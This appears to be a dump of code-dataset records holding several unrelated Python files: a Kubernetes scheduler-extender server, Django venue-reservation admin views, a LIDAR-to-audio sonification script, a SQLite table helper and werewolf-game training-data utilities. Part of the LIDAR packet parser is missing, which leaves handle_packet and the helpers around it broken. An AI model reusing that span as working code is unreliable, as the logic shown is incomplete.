jsonify\n\nfrom wca.config import Numeric\nfrom wca.metrics import Metric, MetricType\nfrom wca.scheduler.algorithms import Algorithm, RescheduleResult\nfrom wca.scheduler.kubeapi import Kubeapi\nfrom wca.scheduler.metrics import MetricName\nfrom wca.scheduler.types import ExtenderArgs, ExtenderFilterResult\n\nlog = logging.getLogger(__name__)\n\nDEFAULT_NAMESPACE = 'default'\nDEFAULT_METRIC_LABELS = {}\nKUBEAPI_DELETE_POD_QUERY = '/api/v1/namespaces/%s/pods/%s'\n\n\nclass Server:\n\n def reschedule_once(self):\n # Decide which tasks should be rescheduled.\n reschedule_result: RescheduleResult = self.algorithm.reschedule()\n\n if len(reschedule_result) > 0:\n log.info('[Rescheduling] %r', reschedule_result)\n\n # Delete them.\n for task in reschedule_result:\n self.kubeapi.delete(KUBEAPI_DELETE_POD_QUERY % (DEFAULT_NAMESPACE, task))\n\n return jsonify(True)\n\n def reschedule_interval(self, interval: Numeric(0, 60)):\n while True:\n self.reschedule()\n time.sleep(interval)\n\n def __init__(self, configuration: Dict[str, str]):\n self.app = Flask('k8s scheduler extender')\n self.algorithm: Algorithm = configuration['algorithm']\n self.kubeapi: Kubeapi = configuration['kubeapi']\n\n reschedule_interval = configuration.get('reschedule_interval')\n\n if reschedule_interval:\n reschedule_thread = threading.Thread(\n target=self.reschedule_interval,\n args=[reschedule_interval])\n reschedule_thread.start()\n\n @self.app.route('/reschedule')\n def reschedule():\n return self.reschedule_once()\n\n @self.app.route('/status')\n def status():\n return jsonify(True)\n\n @self.app.route('/metrics')\n def metrics():\n metrics_registry = self.algorithm.get_metrics_registry()\n if metrics_registry:\n return metrics_registry.prometheus_exposition()\n else:\n return ''\n\n @self.app.route('/filter', methods=['POST'])\n def filter():\n extender_args = ExtenderArgs(**request.get_json())\n pod_namespace = extender_args.Pod['metadata']['namespace']\n pod_name = extender_args.Pod['metadata']['name']\n\n log.debug('[Filter] %r ' % extender_args)\n metrics_registry = self.algorithm.get_metrics_registry()\n\n if DEFAULT_NAMESPACE == pod_namespace:\n log.info('[Filter] Trying to filter nodes for Pod %r' % pod_name)\n\n result = self.algorithm.filter(extender_args)\n\n log.info('[Filter] Result: %r' % result)\n\n if metrics_registry:\n metrics_registry.add(Metric(\n name=MetricName.FILTER,\n value=1,\n labels=DEFAULT_METRIC_LABELS,\n type=MetricType.COUNTER))\n\n return jsonify(asdict(result))\n else:\n log.info('[Filter] Ignoring Pod %r : Different namespace!' %\n pod_name)\n\n if metrics_registry:\n metrics_registry.add(Metric(\n name=MetricName.POD_IGNORE_FILTER,\n value=1,\n labels=DEFAULT_METRIC_LABELS,\n type=MetricType.COUNTER))\n\n return jsonify(ExtenderFilterResult(NodeNames=extender_args.NodeNames))\n\n @self.app.route('/prioritize', methods=['POST'])\n def prioritize():\n extender_args = ExtenderArgs(**request.get_json())\n pod_namespace = extender_args.Pod['metadata']['namespace']\n pod_name = extender_args.Pod['metadata']['name']\n\n metrics_registry = self.algorithm.get_metrics_registry()\n log.debug('[Prioritize-server] %r ' % extender_args)\n\n if DEFAULT_NAMESPACE == pod_namespace:\n log.info('[Prioritize-server] Trying to prioritize nodes for Pod %r' % pod_name)\n\n result = self.algorithm.prioritize(extender_args)\n\n priorities = [asdict(host)\n for host in result]\n\n log.info('[Prioritize-server] Result: %r ' % priorities)\n\n if metrics_registry:\n metrics_registry.add(Metric(\n name=MetricName.PRIORITIZE,\n value=1,\n labels=DEFAULT_METRIC_LABELS,\n type=MetricType.COUNTER))\n\n return jsonify(priorities)\n else:\n log.info('[Prioritize-server] Ignoring Pod %r : Different namespace!' %\n pod_name)\n\n if metrics_registry:\n metrics_registry.add(Metric(\n name=MetricName.POD_IGNORE_PRIORITIZE,\n value=1,\n labels=DEFAULT_METRIC_LABELS,\n type=MetricType.COUNTER))\n\n return jsonify([])\n","sub_path":"wca/scheduler/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":5828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"59220695","text":"# encoding: utf-8\nfrom django.shortcuts import render_to_response\nfrom django.http import HttpResponseRedirect, HttpResponse\n#from django.utils import simplejson\nfrom pools.functions import web_login_required\n# encoding: utf-8\n'''\n\n'''\n\n#using Jinja2\n#from jinja2 import Environment\n#from jinja_helper import render_to_response\n\n#load db\nfrom pools.models import *\n\n#load forms \nfrom pools.model_forms import *\n\n#others\nfrom types import *\n\nimport sys\nimport os\nimport datetime\n\ndef droptables(tblname):\n\t'''delete the table contents\n\t'''\n\tfrom db import models\n\ttbl = getattr(models,tblname)\n\tstR = tbl.objects.all()\n\tfor m in stR:\n\t\tm.delete()\n\ndef tbl_write(flname,tblname):\n\t#import the tables...\n\tfrom db import models\n\timport datetime\n\t\n\tpath = os.path.join(os.path.split(__file__)[0],flname)\n\tfl = open(path,'rb')\n\tidx = 0\n\tfor line in fl.readlines():\n\t\tline = line.replace('\"', '').strip()\n\t\tif idx == 0:\n\t\t\tfields = line.split(\",\")\n\t\telse:\n\t\t\titem = line.split(\",\")\n\t\t\ttbl = getattr(models,tblname)\n\t\t\ttmp_inst = tbl()\n\t\t\tndx = 0\n\t\t\tfor field in fields:\n\t\t\t\tfdtype = tmp_inst._meta.get_field(field).get_internal_type() \n\t\t\t\tif item[ndx]:\n\t\t\t\t\t\tif fdtype == 'AutoField' or fdtype == 'BooleanField' or fdtype =='IntegerField':\n\t\t\t\t\t\t\tins_value = int(item[ndx])\n\t\t\t\t\t\telif fdtype == 'CharField':\n\t\t\t\t\t\t\tins_value = item[ndx]\n\t\t\t\t\t\telif fdtype == 'TextField':\n\t\t\t\t\t\t\tins_value = item[ndx]\n\t\t\t\t\t\telif fdtype == 'DateField':\n\t\t\t\t\t\t\tins_value = item[ndx]\n\t\t\t\t\t\telif fdtype == 'DateTimeField':\n\t\t\t\t\t\t\tdateObj =datetime.datetime.strptime(item[ndx],'%m-%d-%Y; %H:%M')\n\t\t\t\t\t\t\tdateS = datetime.datetime.strftime(dateObj,'%Y-%m-%d %H:%M')\n\t\t\t\t\t\t\tins_value = dateS\n\t\t\t\t\t\telif fdtype == 'ForeignKey':\n\t\t\t\t\t\t\tif field == 'place_no':\n\t\t\t\t\t\t\t\tfkobj = getattr(models, 'place')\n\t\t\t\t\t\t\t\tfkinst = fkobj.objects.get(place_no = int(item[ndx]))\n\t\t\t\t\t\t\telif field == 'u_id':\n\t\t\t\t\t\t\t\tfkobj = getattr(models, 'who')\n\t\t\t\t\t\t\t\tfkinst = fkobj.objects.get(u_id = int(item[ndx]))\n\t\t\t\t\t\t\tins_value = fkinst\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tndx = ndx + 1\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\tsetattr(tmp_inst, field, ins_value )\n\t\t\t\tndx = ndx + 1\n\t\t\ttmp_inst.save()\n\t\tidx = idx + 1\n\tfl.close()\n\t\ndef tbl_inserts(request):\n\t'''\n\tthis function: 用來將所有資料回寫到資料表中\n\t'''\n\t#try to write \n\t#droptables('place')\n\t#tbl_write('place.csv','place')\n\t#droptables('who')\n\t#tbl_write('who.csv','who')\n\t#droptables('reserve')\n\t\n\t#tbl_write('reserve.csv','reserve')\n\t#tbl_write('messages.csv','messages')\n\ttbl_write('User.csv','members')\n\tmsg = u'資料寫入完成...'\n\treturn render_to_response('OK.html',{'msg':msg})\n\ndef index(request):\n\t'''\n\tmain screen for admin\n\t'''\n\ttry:\n\t\tif request.session['usrid']:\n\t\t\tpass\n\t\telse:\n\t\t\treturn HttpResponseRedirect('/place_manage/')\n\texcept:\n\t\treturn HttpResponseRedirect('/place_manage/')\n\t\n\ttry:\n\t\tusrRight = request.session['usrRight']\n\texcept:\n\t\tusrRight = 0\n\tif usrRight != 99:\n\t\tmsg = u'無管理者權限...'\n\t\treturn render_to_response('OK.html',{'msg':msg})\n\t\n\tmsg = u'管理者功能主頁'\n\t\n\treturn render_to_response('/member/index.htm',{'msg':msg})\n\ndef message(request):\n\t'''\n\t發佈消息\n\t'''\n\tmsg = u'發佈消息'\n\tcForm = messagesAdminForm()\n\tif request.method == 'POST':\n\t\t#valid the value\n\t\tcForm = messagesAdminForm(request.POST)\n\t\tif cForm.is_valid():\n\t\t\tcForm.save()\n\t\t\tmsg = u'消息發佈成功...'\n\t\t\treturn render_to_response('OK.html',{'msg':msg})\n\treturn render_to_response('/member/message.html',{'msg':msg,'form':cForm})\n\ndef place_add(request):\n\t'''\n\t新增場地\n\t'''\n\tmsg = u'新增場地及使用規則'\n\tif request.method == 'POST':\n\t\tif request.POST['submit']:\n\t\t\tplaceobj = place()\n\t\t\tplaceobj.name =request.POST['Name']\n\t\t\tplaceobj.location = request.POST['location']\n\t\t\tplaceobj.regulation=request.POST['regulation']\n\t\t\tpgroups=''\n\t\t\ttry:\n\t\t\t\tif request.POST['place_m_groups']:\n\t\t\t\t\tpgroups = request.POST['place_m_groups']\n\t\t\texcept:\n\t\t\t\tpass\n\t\t\tif request.POST['place_groups'] != 'none':\n\t\t\t\tpgroups = request.POST['place_groups']\n\t\t\tplaceobj.place_groups = pgroups\n\t\t\tplaceobj.save()\n\t\t\tmsg = u'場地資訊新增成功...'\n\t\t\treturn render_to_response('OK.html',{'msg':msg})\n\tcForm = placeAdminForm()\n\t#要找出群組場地...\n\t#因為不支援distinct(),只好自行做一個distinct功能...\n\t#原理是利用 dict 的key 必須是unique, 因此會自動濾除重複值\n\tplaces = place.objects.all().values(\"place_groups\").order_by(\"place_groups\")\n\tpvalues = []\n\tfor item in places:\n\t\tpvalues.append(item['place_groups'])\n\tuniqlist = dict.fromkeys(pvalues).keys() \n\treturn render_to_response('/member/place_add.html',{'msg':msg,'form':cForm,'pgroup':uniqlist})\n\nfrom pools.util import *\n\ndef user_mgm(request):\n\t'''\n\t使用者管理\n\t'''\n\tmsg = u'使用者管理'\n\tnext = request.path\n\t\n\t#加入頁次計算,每頁15筆,每個畫面10頁\n\tnext = request.path\n\tcurrpage = 1\n\ttry:\n\t\tif request.GET['page']:\n\t\t\tcurrpage = int(request.GET.get('page', '1'))\n\texcept:\n\t\tcurrpage = 1\n\ttry:\n\t\tif request.GET['preScr']:\n\t\t\tcurScr = int(request.GET.get('preScr','0'))\n\t\t\tcurrpage = int(curScr)*10+1\n\texcept:\n\t\tcurScr = 0\n\ttry:\n\t\tif request.GET['nextScr']:\n\t\t\tnextScr = int(request.GET.get('nextScr','1'))\n\t\t\tcurrpage = int(nextScr)*10+1\n\texcept:\n\t\tnextScr = 1\n\twhoObj = who.objects.all().order_by('-u_id')\n\tperScr = 10\n\tperPage = 15\n\tcurScrObj = pageNav(whoObj,currpage,perScr,perPage)\n\treturn render_to_response('/member/user_mgm.html',{'msg':msg,'messgs':curScrObj['pageObj'], 'navobj':curScrObj,'next':next})\n\ndef user_detail(request):\n\t'''\n\t這個細項頁面可以用來核發使用權\n\t'''\n\tif request.method == 'POST':\n\t\tif request.POST['submit']:\n\t\t\tuid = request.POST['u_id']\n\t\t\twhoObj = who.objects.get(u_id=uid)\n\t\t\tcForm = whoAdminForm(request.POST,instance=whoObj)\n\t\t\tif cForm.is_valid():\n\t\t\t\tcForm.save()\n\t\t\t\tmsg = u'使用者資料更新成功...'\n\t\t\t\treturn render_to_response('OK.html',{'msg':msg})\n\tnexturl = '/'\n\ttry:\n\t\tif request.GET['next']:\n\t\t\tnexturl = request.GET['next']\n\texcept:\n\t\tpass\n\t#detail for reserved place...\n\ttry:\n\t\tif request.GET['rid']:\n\t\t\trid = request.GET['rid']\n\texcept:\n\t\trid = 1\n\twhoObj = who.objects.get(u_id =rid)\n\tcForm = whoAdminForm(instance=whoObj)\n\t#need to prepare the regulation rule...\n\t\n\tmsg = u'顯示使用者資料,並且可以核發使用權'\n\treturn render_to_response('/member/user_detail.html',{'dspobj':whoObj,'form':cForm,'next':nexturl,'rid':rid})\n\n\ndef place_mgm(request):\n\t'''\n\t場地管理\n\t'''\n\tmsg = u'場地管理'\n\tnext = request.path\n\t\n\t#加入頁次計算,每頁5筆,每個畫面10頁\n\tnext = request.path\n\tcurrpage = 1\n\ttry:\n\t\tif request.GET['page']:\n\t\t\tcurrpage = int(request.GET.get('page', '1'))\n\texcept:\n\t\tcurrpage = 1\n\ttry:\n\t\tif request.GET['preScr']:\n\t\t\tcurScr = int(request.GET.get('preScr','0'))\n\t\t\tcurrpage = int(curScr)*10+1\n\texcept:\n\t\tcurScr = 0\n\ttry:\n\t\tif request.GET['nextScr']:\n\t\t\tnextScr = int(request.GET.get('nextScr','1'))\n\t\t\tcurrpage = int(nextScr)*10+1\n\texcept:\n\t\tnextScr = 1\n\tplaceObj = place.objects.all().order_by('-place_no')\n\tperScr = 10\n\tperPage = 5\n\tcurScrObj = pageNav(placeObj,currpage,perScr,perPage)\n\treturn render_to_response('/member/place_mgm.html',{'msg':msg,'messgs':curScrObj['pageObj'], 'navobj':curScrObj,'next':next})\n\ndef place_detail(request):\n\t'''\n\t這個細項頁面可以用來更改場地資訊\n\t'''\n\tif request.method == 'POST':\n\t\tif request.POST['submit']:\n\t\t\tp_no = request.POST['placeno']\n\t\t\tplaceobj = place.objects.get(place_no=p_no)\n\t\t\tplaceobj.name =request.POST['name']\n\t\t\tplaceobj.location = request.POST['location']\n\t\t\tplaceobj.regulation=request.POST['regulation']\n\t\t\tpgroups=''\n\t\t\ttry:\n\t\t\t\tif request.POST['place_m_groups']:\n\t\t\t\t\tpgroups = request.POST['place_m_groups']\n\t\t\texcept:\n\t\t\t\tpass\n\t\t\tif request.POST['place_groups'] != 'none':\n\t\t\t\tpgroups = request.POST['place_groups']\n\t\t\tplaceobj.place_groups = pgroups\n\t\t\tplaceobj.save()\n\t\t\tmsg = u'場地資訊新增成功...'\n\t\t\treturn render_to_response('OK.html',{'msg':msg})\n\tnexturl = '/'\n\ttry:\n\t\tif request.GET['next']:\n\t\t\tnexturl = request.GET['next']\n\texcept:\n\t\tpass\n\t#detail for reserved place...\n\ttry:\n\t\tif request.GET['rid']:\n\t\t\trid = request.GET['rid']\n\texcept:\n\t\trid = 1\n\tplaceObj = place.objects.get(place_no =rid)\n\tcForm = placeAdminForm(instance=placeObj)\n\t#got the regulations\n\trule = placeObj.regulation\n#\tdspRule = DspRule(ParseRule(rule))\n\tdspRule = ParseRule(rule)\n\tplaces = place.objects.all().values(\"place_groups\").order_by(\"place_groups\")\n\tpvalues = []\n\tfor item in places:\n\t\tpvalues.append(item['place_groups'])\n\tuniqlist = dict.fromkeys(pvalues).keys() \n\tmsg = u'場地資訊更新'\n\treturn render_to_response('/member/place_detail.html',{'msg':msg,'form':cForm,'pgroup':uniqlist,'rid':rid,'dspRule':dspRule})\n\n\ndef place_approve(request):\n\t'''\n\t場地申請審核\n\t'''\n\tmsg = u'場地申請審核'\n\t#加入頁次計算,每頁15筆,每個畫面10頁\n\tnext = request.path\n\tcurrpage = 1\n\ttry:\n\t\tif request.GET['page']:\n\t\t\tcurrpage = int(request.GET.get('page', '1'))\n\texcept:\n\t\tcurrpage = 1\n\ttry:\n\t\tif request.GET['preScr']:\n\t\t\tcurScr = int(request.GET.get('preScr','0'))\n\t\t\tcurrpage = int(curScr)*10+1\n\texcept:\n\t\tcurScr = 0\n\ttry:\n\t\tif request.GET['nextScr']:\n\t\t\tnextScr = int(request.GET.get('nextScr','1'))\n\t\t\tcurrpage = int(nextScr)*10+1\n\texcept:\n\t\tnextScr = 1\n\tmsg = u'場地使用情形'\n\tresObj = reserve.objects.all().order_by('-end_date')\n\tperScr = 10\n\tperPage = 5\n\tcurScrObj = pageNav(resObj,currpage,perScr,perPage)\n\t\n\treturn render_to_response('/member/place_approve.html',{'msg':msg,'messgs':curScrObj['pageObj'], 'navobj':curScrObj,'next':next})\n\ndef approve_detail(request):\n\t'''\n\t場地使用審核\n\t'''\n\tif request.method == 'POST':\n\t\tif request.POST['submit']:\n\t\t\trid = request.POST['rev_id']\n\t\t\trevObj = reserve.objects.get(r_id =rid)\n\t\t\trevObj.approve =request.POST['approve']\n\t\t\trevObj.remarks = request.POST['remarks']\n\t\t\trevObj.save()\n\t\t\tmsg = u'場地使用申請審核完成...'\n\t\t\treturn render_to_response('OK.html',{'msg':msg})\n\tnexturl = '/'\n\ttry:\n\t\tif request.GET['next']:\n\t\t\tnexturl = request.GET['next']\n\texcept:\n\t\tpass\n\t#detail for reserved place...\n\ttry:\n\t\tif request.GET['rid']:\n\t\t\trid = request.GET['rid']\n\texcept:\n\t\trid = 1\n\trevObj = reserve.objects.get(r_id =rid)\n\t\n\t#need to prepare the regulation rule...\n\tdspObj={}\n\tdspObj['department']=revObj.u_id.department\n\tdspObj['usrname']=revObj.u_id.name\n\tdspObj['usrphone']=revObj.u_id.phone\n\tdspObj['start_date']=revObj.start_date\n\tdspObj['end_date']=revObj.end_date\n\tdspObj['name']=revObj.place_no.name\n\trule = revObj.place_no.regulation\n\tdspRule = DspRule(ParseRule(rule))\n\tdspObj['regulation']=dspRule\n\tdspObj['application']=revObj.application\n\tdspObj['approve']=revObj.approve\n\tdspObj['remarks']=revObj.remarks\n\t\n\tcForm = reserveAdminForm(dspObj)\n\tmsg = u'場地使用申請細項資料'\n\treturn render_to_response('/member/approve_detail.html',{'form':cForm,'dspobj':dspObj,'msg':msg,'next':nexturl,'revid':rid})\n","sub_path":"WebApp/pools/member/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"90827434","text":"import struct\r\nimport socket\r\nimport traceback\r\nimport math\r\nimport matplotlib\r\nfrom matplotlib import pyplot as plt\r\nimport threading\r\nimport pyaudio\r\nimport numpy as np\r\nimport sklearn.cluster\r\nimport time\r\n\r\nobjlock = threading.Lock()\r\nobjects = []\r\n#fig, ax = plt.subplots()\r\n#plt.show(block=False)\r\n\r\ndef handle_points(points):\r\n # Reset switch values.\r\n points = [(*polar_to_cartesian(*p[:3]), *p) for p in points]\r\n points = [p for p in points if p[5] < 2.8 and -1 < p[2] < 1]\r\n # TODO try including reflectivity\r\n cart = [p[:3] for p in points]\r\n mcart = np.array([np.array(p) for p in cart])\r\n if not cart:\r\n return\r\n core_samples, labels = sklearn.cluster.dbscan(mcart, eps=0.2, min_samples=20)\r\n clusters = set(labels) - {-1}\r\n n_clusters = len(clusters)\r\n #ax.cla()\r\n #ax.set_xlim(-2.8, 2.8)\r\n #ax.set_ylim(-2.8, 2.8)\r\n global objects\r\n objlock.acquire(True)\r\n objects = []\r\n for i, label in enumerate(clusters):\r\n pts = mcart[labels == label]\r\n center = np.sum(pts, axis=0) / len(pts)\r\n #ax.plot([center[0]], [center[1]], 'bo')\r\n objects.append(center)\r\n objlock.release()\r\n x = [p[0] for p in cart]\r\n y = [p[1] for p in cart]\r\n hues = np.arange(n_clusters) / n_clusters\r\n colors = [matplotlib.colors.hsv_to_rgb((h, 1.0, 1.0)) for h in hues] + [(0, 0, 0)]\r\n #print(colors)\r\n #colors = ['red', 'green', 'blue', 'yellow', 'magenta', 'orange', 'gray', 'cyan', 'purple', 'gray', 'indigo', 'lime', 'navy', 'fuschia', 'black']\r\n #ax.scatter(x, y, 1, c=[colors[label] for label in labels])\r\n # im = [[0] * 4 for _ in range(4)]\r\n # for i, (x, y, _, _) in enumerate(grid):\r\n # im[y][x] = switches[i]\r\n # if switches != old_switches:\r\n # ax.imshow(im, cmap=plt.cm.binary, origin='lower')\r\n #fig.canvas.draw()\r\n #fig.canvas.flush_events()\r\n\r\ndef capture(port):\r\n soc = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n soc.bind(('', port))\r\n try:\r\n last_azimuth = 2*np.pi\r\n points = []\r\n while True:\r\n data = soc.recv(2000)\r\n if len(data) > 0:\r\n new_points = handle_packet(data)\r\n if not new_points:\r\n continue\r\n start_azimuth = new_points[0][0]\r\n end_azimuth = new_points[-1][0]\r\n points += new_points\r\n if end_azimuth < last_azimuth:\r\n handle_points(points)\r\n points = []\r\n last_azimuth = end_azimuth\r\n except KeyboardInterrupt as e:\r\n return\r\n\r\ndef handle_packet(data):\r\n assert len(data) == 1206, len(data)\r\n timestamp, factory = struct.unpack_from(\" 0:\r\n points.append((azimuth, altitude, dist, refl))\r\n return points\r\n\r\ndef audio_loop():\r\n p = pyaudio.PyAudio()\r\n\r\n fs = 22050\r\n stream = p.open(format=pyaudio.paFloat32,\r\n channels=1,\r\n rate=fs,\r\n output=True)\r\n\r\n chunk_size = 2048\r\n t = 0\r\n old_freq = 0\r\n mult = 0\r\n offset = 0\r\n while True:\r\n chunk = np.zeros(chunk_size)\r\n objlock.acquire(True)\r\n polars = [cartesian_to_polar(*center) for center in objects]\r\n objlock.release()\r\n polars.sort(key=lambda p: p[2])\r\n total = 0\r\n #for i, (az, alt, dist) in enumerate(polars[:1]):\r\n i = 0\r\n if not polars:\r\n stream.write(chunk.astype(np.float32).tostring())\r\n continue\r\n az, alt, dist = polars[0]\r\n #print('HELLO', i, az / (2 * np.pi), center)\r\n pc = az / (2 * np.pi) * 12\r\n freq = 440 * (2**(pc/12))\r\n shep = shepard_tones(pc)\r\n level = 1 - min(1, max(0, (dist - 0.5) / 2.3))\r\n amp = 0.1 * (np.exp(level * 2) - 1)\r\n total += amp\r\n print(i, pc, freq, amp)\r\n #print('F', pc, old_freq, freq)\r\n #freqs = np.linspace(old_freq, freq, chunk_size)\r\n old_t = t - chunk_size\r\n old_offset = offset\r\n old_mult = mult\r\n last_phase = t * old_mult + old_offset\r\n mult = freq / fs * 2 * np.pi\r\n offset = last_phase - t * mult\r\n for scale, freq_scale in [(pc / 12, 1 / 2), (1 - pc / 12, 1)]:#scale, freq in shep:\r\n last_phase = t * old_mult * freq_scale + old_offset * freq_scale\r\n tmp_offset = last_phase - t * mult * freq_scale\r\n chunk += scale / 2 * amp * np.sin((t + np.arange(chunk_size)) * mult * freq_scale + tmp_offset)\r\n print('edges', chunk[0], chunk[-1])\r\n #old_freq = freq\r\n print(total)\r\n if total > 1:\r\n chunk /= total\r\n stream.write(chunk.astype(np.float32).tostring())\r\n t += chunk_size\r\n\r\n stream.stop_stream()\r\n stream.close()\r\n\r\n p.terminate()\r\n\r\ndef shepard_tones(pc):\r\n mid_freq = 440 * (2**(pc/12))\r\n bot_freq = mid_freq / 2\r\n frac = pc / 12\r\n return ((frac, bot_freq), (1 - frac, mid_freq))\r\n\r\nif __name__ == '__main__':\r\n threading.Thread(target=audio_loop).start()\r\n capture(2368)\r\n #threading.Thread(target=lambda: capture(2368)).start()","sub_path":"shepard_scale_magic__one_object_.py","file_name":"shepard_scale_magic__one_object_.py","file_ext":"py","file_size_in_byte":6704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"279328568","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\n# Gald - a simple accounting tool\n#\n# Author: slowpoke \n#\n# This program is free software under the non-terms\n# of the Anti-License. Do whatever the fuck you want.\n#\n# Github: https://www.github.com/proxypoke/Gald\n# (Shortlink: https://git.io/gald)\n\nimport database\nimport types\nfrom abc import ABCMeta, abstractmethod\n\n\n# type conversion map Python → SQLite\n_typemap = {\n type(None): \"NULL\",\n int: \"INTEGER\",\n float: \"REAL\",\n str: \"TEXT\",\n bytes: \"BLOB\"}\n\n\nclass Table(metaclass=ABCMeta):\n '''banana banana banana'''\n\n # has the table been initialized in the database yet?\n __initialized = False\n\n def __init__(self, rowid):\n self._rowid = rowid\n\n @property\n def rowid(self):\n return self._rowid\n\n @classmethod\n def _init(cls):\n '''Create a table in the database from the class' attributes.'''\n if cls.__initialized:\n return\n\n # get the column names from the class' attributes\n cols = [var.lower() for var in dir(cls)\n # exclude private attributes\n if not var.startswith(\"_\")\n # exclude methods\n and not (isinstance(getattr(cls, var), types.FunctionType)\n or isinstance(getattr(cls, var), types.MethodType))]\n attrmap = {col: getattr(cls, col) for col in cols}\n\n # begin constructing query & create all needed properties\n lines = [] # the lines inside the CREATE TABLE block\n for col, attr in attrmap.items():\n # do not process cls.rowid unless it was explicitly overwritten\n if col == \"rowid\" and type(attr) is property:\n continue\n\n # only a type was given, create a column with no default value\n if type(attr) is type:\n lines.append(cls._make_column_by_type(col, attr))\n # otherwise, try to construct a column with default value\n else:\n lines.append(cls._make_column_by_value(col, attr))\n # finally, add the new column to the class as a property\n cls._add_prop(col)\n\n query = \"CREATE TABLE IF NOT EXISTS {} (\\n\".format(cls.__name__)\n query += \",\\n\".join(lines)\n query += \" )\"\n # save the query for later review\n cls.__schema__ = property(lambda _: query)\n\n database.cursor().execute(query)\n cls.__initialized = True\n\n @classmethod\n def _add_prop(cls, col):\n '''Add a property to this class.'''\n prop = property(\n lambda self: self._get_query(col),\n lambda self, val: self._set_query(col, val))\n setattr(cls, col, prop)\n\n @classmethod\n def _make_column_by_type(cls, col, type_):\n '''Create a line for a CREATE TABLE query with only a type.'''\n t = cls._convert_or_raise(type_)\n return \"{} {}\".format(col, t)\n\n @classmethod\n def _make_column_by_value(cls, col, val):\n '''Create a line for a CREATE TABLE query with a default value.'''\n t = cls._convert_or_raise(type(val))\n return \"{} {} DEFAULT {}\".format(col, t, val)\n\n @staticmethod\n def _convert_or_raise(type_):\n '''Convert a type into a SQLite type if possible, else raise.'''\n if not type_ in _typemap:\n raise TypeError( \"Invalid type for SQLite: {}\".format(type_))\n return _typemap[type_]\n\n @classmethod\n @abstractmethod\n def new(cls, cols, vals):\n '''Create a new row in the appropriate table and return a new instance\n of the class.'''\n cls._init()\n for col in cols:\n cls._check_column(col)\n cols = \"(\" + \", \".join(cols) + \")\"\n # construct the placeholders string\n plhs = \"(\" + \", \".join([\"?\" for _ in range(len(vals))]) + \")\"\n query = 'INSERT INTO {} {} VALUES {}'.format(cls.__name__, cols, plhs)\n c = database.cursor()\n c.execute(query, vals)\n return cls(c.lastrowid)\n\n @classmethod\n def _check_column(cls, column):\n if column not in database.get_column_names(cls.__name__):\n raise ValueError(\"Invalid column name: {}\".format(column))\n\n def _get_query(self, column):\n '''Construct a getter query with sanitized inputs.'''\n column = column.lower()\n self._check_column(column)\n c = database.cursor()\n return c.execute(\"SELECT {} FROM {} WHERE _rowid_ = ?\".format(\n column, self.__class__.__name__),\n (self.rowid,)).fetchone()[0]\n\n def _set_query(self, column, value):\n '''Construct a setter query with sanitized inputs.'''\n column = column.lower()\n self._check_column(column)\n c = database.cursor()\n return c.execute(\"UPDATE {} SET {} = ? WHERE _rowid_ = ?\".format(\n self.__class__.__name__, column), (value, self.rowid))\n","sub_path":"table.py","file_name":"table.py","file_ext":"py","file_size_in_byte":4978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"155033909","text":"import sys\nimport glob\nimport os\nimport shutil\n\n\n# ログフォルダ内の全ファイル名をFILE_LISTに格納\ndef setLogPath(PLAY_NUM, YEAR):\n LOG_PATH = glob.glob(\n sys.path[0] + \"/../data/log/{}/{}/*\".format(PLAY_NUM, YEAR))\n return LOG_PATH\n\n\n# 「START_TURN-END_TURN」フォルダを作成する\n# SAVE_PATHをセットする\ndef setSavePath(PLAY_NUM, YEAR, TYPE, FOLDER_NAME, START_TURN, END_TURN):\n SAVE_PATH = sys.path[0] + \"/../data/train/{}/{}/{}/{}/{}/{}\".format(\n PLAY_NUM, YEAR, TYPE, FOLDER_NAME, START_TURN, END_TURN)\n if not os.path.exists(SAVE_PATH):\n os.makedirs(SAVE_PATH)\n else:\n shutil.rmtree(SAVE_PATH)\n\n return SAVE_PATH\n\n\n# 学習データ用にLSTM_INFO内の値をTRAIN_LISTに格納する\ndef setTrainList(LSTM_INFO, TRAIN_LIST, START_TURN):\n turn = START_TURN # ターン用\n for lstm_info in LSTM_INFO.values(): # {\"ターン\":{}}\n for info in lstm_info.values(): # {\"プレイヤー\":[]}\n for val in info.values():\n for i in val:\n TRAIN_LIST[str(turn)].append(i)\n turn += 1\n\n\n# 各特徴量を入れる配列の添字を振り分ける\ndef setSubscript(FEATURE_LIST):\n ref_num = 0\n for feature, val in FEATURE_LIST.items():\n if val[0]:\n if type(val[1]) == dict:\n for feature2, val2 in val[1].items():\n if val2[0]:\n if type(val2[1]) == dict:\n for role, j in val2[1].items():\n if j[0]:\n j[1][feature2] = ref_num\n ref_num += 1\n else:\n val2[1] = ref_num\n ref_num += 1\n else:\n val[1] = ref_num\n ref_num += 1\n\n\n# ROLE辞書に特徴名を追加\ndef setRoleFeature(feature, role):\n for val in role.values():\n if val[0]:\n val[1][feature] = None\n # print(DIVINED_ROLE)\n\n\n# トーク履歴を追加する\ndef setTalkHistroy(text, TALK_HISTROY):\n remark = text[5].split()\n idx = text[4] # 発言したプレイヤー番号\n idt = text[2] # トークのID\n day = text[0] # 日にち\n TALK_HISTROY[day][idt] = int(idx)\n\n\n# 使用する特徴量の数を計算\ndef setFeatureNum(FEATURE_LIST):\n count = 0\n for val in FEATURE_LIST.values():\n if val[0]:\n if type(val[1]) == dict:\n for feature, i in val[1].items():\n if i[0]:\n if type(i[1]) == dict:\n setRoleFeature(feature, i[1])\n for j in i[1].values():\n if j[0]:\n count += 1\n else:\n count += 1\n else:\n count += 1\n # print(FEATUER_NUM)\n return count\n\n\n# PARAMに値を格納\ndef setParam(PARAM, FEATUER_NUM, PLAY_NUM, START_TURN, END_TURN, DAY_NUM):\n PARAM[\"input\"] = FEATUER_NUM * PLAY_NUM\n PARAM[\"output\"] = PLAY_NUM\n PARAM[\"len_t\"] = (END_TURN - START_TURN + 1) * DAY_NUM\n # print(PARAM)\n # sys.exit()\n\n\n# NOT_INFOにプレイヤー番号と-1を書き込む\ndef setNotInfo(PLAY_NUM, 